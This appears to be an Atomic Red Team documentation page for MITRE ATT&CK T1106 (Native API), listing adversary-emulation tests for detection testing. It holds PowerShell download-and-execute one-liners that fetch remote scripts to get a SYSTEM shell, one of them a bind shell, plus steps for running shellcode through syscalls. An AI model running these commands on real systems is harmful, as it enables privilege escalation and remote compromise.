T1106 - Native API

Description from ATT&CK

Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations. Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system. Native API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC) Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation) Adversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.(Citation: Redops Syscalls) Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001).

Atomic Tests


Atomic Test #1 - Execution through API - CreateProcess

Execute program by leveraging Win32 API’s. By default, this will launch calc.exe from the command prompt.

Supported Platforms: Windows

auto_generated_guid: 99be2089-c52d-4a4a-b5c3-261ee42c8b62

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | source_file | Location of the CSharp source file to compile and execute | path | PathToAtomicsFolder\T1106\src\CreateProcess.cs| | output_file | Location of the payload | path | %tmp%\T1106.exe|

Attack Commands: Run with
1
command_prompt
!

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:"#{output_file}" /target:exe "#{source_file}"
%tmp%/T1106.exe

Dependencies: Run with
1
powershell
!

Description: #{source_file} must exist on system.
Check Prereq Commands:
1
if (Test-Path "#{source_file}") {exit 0} else {exit 1}
Get Prereq Commands:
1
2
New-Item -Type Directory (split-path "#{source_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1106/src/CreateProcess.cs" -OutFile "#{source_file}"



Atomic Test #2 - WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique

Get SYSTEM shell - Pop System Shell using CreateProcess technique via function of WinPwn

Supported Platforms: Windows

auto_generated_guid: ce4e76e6-de70-4392-9efe-b281fc2b4087

Attack Commands: Run with
1
powershell
!

1
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystem.ps1')



Atomic Test #3 - WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique

Get SYSTEM shell - Bind System Shell using CreateProcess technique via function of WinPwn

Supported Platforms: Windows

auto_generated_guid: 7ec5b74e-8289-4ff2-a162-b6f286a33abd

Attack Commands: Run with
1
powershell
!

1
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystemBind.ps1')



Atomic Test #4 - WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique

Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique via function of WinPwn

Supported Platforms: Windows

auto_generated_guid: e1f93a06-1649-4f07-89a8-f57279a7d60e

Attack Commands: Run with
1
powershell
!

1
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/NamedPipe/NamedPipeSystem.ps1')



Atomic Test #5 - Run Shellcode via Syscall in Go

Runs shellcode in the current running process via a syscall.

Steps taken with this technique

  1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
  2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
  3. Change the memory page permissions to Execute/Read with VirtualProtect
  4. Use syscall to execute the entrypoint of the shellcode

Supported Platforms: Windows

auto_generated_guid: ae56083f-28d0-417d-84da-df4242da1f7c

Attack Commands: Run with
1
powershell
!

1
$PathToAtomicsFolder\T1106\bin\x64\syscall.exe -debug

Cleanup Commands:

1
Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue